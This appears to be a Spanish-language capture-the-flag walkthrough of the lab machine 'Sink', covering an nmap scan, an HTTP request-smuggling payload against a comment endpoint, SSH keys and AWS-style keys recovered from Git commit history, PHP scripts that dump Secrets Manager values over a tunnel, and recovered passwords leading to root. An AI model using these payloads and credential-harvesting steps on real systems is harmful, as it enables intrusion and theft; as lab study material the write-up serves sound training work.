# Sink

**OS**: Linux \
**Dificultad**: Insano \
**Puntos**: 50

## Resumen

## Nmap Scan

`nmap -sV -sC -oN nmap.txt  10.10.10.225`

```
Nmap scan report for 10.10.10.225
Host is up (0.065s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=c043ac8fcdc16a8a; Path=/; HttpOnly
|     Set-Cookie: _csrf=3U9xtmklq7NbECSm0SlG2JCSJG06MTYyMTI2ODUxMjY5NDExODQzMA; Path=/; Expires=Tue, 18 May 2021 16:21:52 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 17 May 2021 16:21:52 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=e8abd7ec58b9dc8e; Path=/; HttpOnly
|     Set-Cookie: _csrf=yvEmH8Lq7a2060oRTQ5Lz8rLhGw6MTYyMTI2ODUxODAzNDQyMDc4MA; Path=/; Expires=Tue, 18 May 2021 16:21:58 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 17 May 2021 16:21:58 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
5000/tcp open  http    Gunicorn 20.0.0
|_http-server-header: gunicorn/20.0.0
|_http-title: Sink Devops
```

## Enumeración

para lo siguiente


```
POST /comment HTTP/1.1
Host: 10.10.10.225:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 353
Origin: http://10.10.10.225:5000
Connection: keep-alive
Referer: http://10.10.10.225:5000/home
Cookie: lang=en-US; i_like_gitea=a4a8bbec763bbdf9; _csrf=2jg31U1MMXUdaQo_xDf89OSQnzU6MTYyMTI3MDQ4ODg1NDU1MjM1MA; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YKKhqA.eHfa5Oe-CNLByhAshbtEumyNbJo
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked

5
msg=a
0

POST /comment HTTP/1.1
Host: localhost:5000
Cookie: lang=en-US; i_like_gitea=a4a8bbec763bbdf9; _csrf=2jg31U1MMXUdaQo_xDf89OSQnzU6MTYyMTI3MDQ4ODg1NDU1MjM1MA; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YKKhqA.eHfa5Oe-CNLByhAshbtEumyNbJo
Content-Length: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded

msg=
```

```
root : FaH@3L>Z3})zzfQ3
```
## Escalada de Privilegios (User)

`http://10.10.10.225:3000/root/Key_Management/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e`

`http://10.10.10.225:3000/root/Key_Management/raw/commit/b01a6b7ed372d154ed0bc43a342a5e1203d07b1e/.keys/dev_keys`

`chmod 400 dev_keys`
`ssh -i dev_keys marcus@10.10.10.225`


## Escalada de Privilegios (Root)

`http://10.10.10.225:3000/root/Log_Management/commit/bee2670414f70e0f34f59b6695e9e19b32c2215d`
```
'key' => 'AKIAIUEN3QWCPSTEITJQ',
'secret' => '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'
```

`unzip Key_Management-master.zip`
`ssh -N -L 4566:127.0.0.1:4566 -i dev_keys marcus@10.10.10.225`


```php
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
    'region' => 'eu',
    'endpoint' => 'http://127.0.0.1:4566',
    'credentials' => [
        'key' => 'AKIAIUEN3QWCPSTEITJQ',
        'secret' => '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'
    ],
    'version' => 'latest'
]);

try {
        $result = $client->listSecrets([]);
        var_dump($result);
} catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}

?>
```

`php listsecrets.php`

```
us-east-1:1234567890:secret:Jenkins Login-NooXk
us-east-1:1234567890:secret:Sink Panel-dhvOG
us-east-1:1234567890:secret:Jira Support-nkDeU
```

```php
<?php
require 'vendor/autoload.php';

use Aws\SecretsManager\SecretsManagerClient;
use Aws\Exception\AwsException;

$client = new SecretsManagerClient([
        'region' => 'eu',
        'endpoint' => 'http://127.0.0.1:4566',
        'credentials' => [
                'key' => 'AKIAIUEN3QWCPSTEITJQ',
                'secret' => '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'
        ],
        'version' => 'latest'
]);

$secretIDs = ["arn:aws:secretsmanager:us-east-1:1234567890:secret:Jenkins Login-NooXk",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Sink Panel-dhvOG",
    "arn:aws:secretsmanager:us-east-1:1234567890:secret:Jira Support-nkDeU"];

try {
for ($i=0; $i<count($secretIDs); $i++) {
    $result = $client->getSecretValue(array(
        'SecretId' => $secretIDs[$i],
    ));
    var_dump($result);
}
}
catch (AwsException $e) {
    echo $e->getMessage();
    echo "\n";
}
```

`php getsecrets.php`

```
john@sink.htb :R);\)ShS99mZ~8j
albert@sink.htb : Welcome123!
david@sink.htb : EALB=bcC=`a7f2#k
```

`su david`


`cd /home/david/Projects/Prod_Deployment`
`base64 -w 0 servers.enc`

`base64 -d data > decode.gz`
`gunzip decode.gz`

```
root : _uezduQ!EY5AHfe2
```

`ssh root@10.10.10.225`




## Referencias
https://gist.github.com/ndavison/4c69a2c164b2125cd6685b7d5a3c135b \
https://nathandavison.com/blog/haproxy-http-request-smuggling \
https://docs.aws.amazon.com/sdk-for-php/v3/developer-guide/secretsmanager-examples-manage-secret.html \
https://docs.aws.amazon.com/kms/latest/developerguide/programming-encryption.html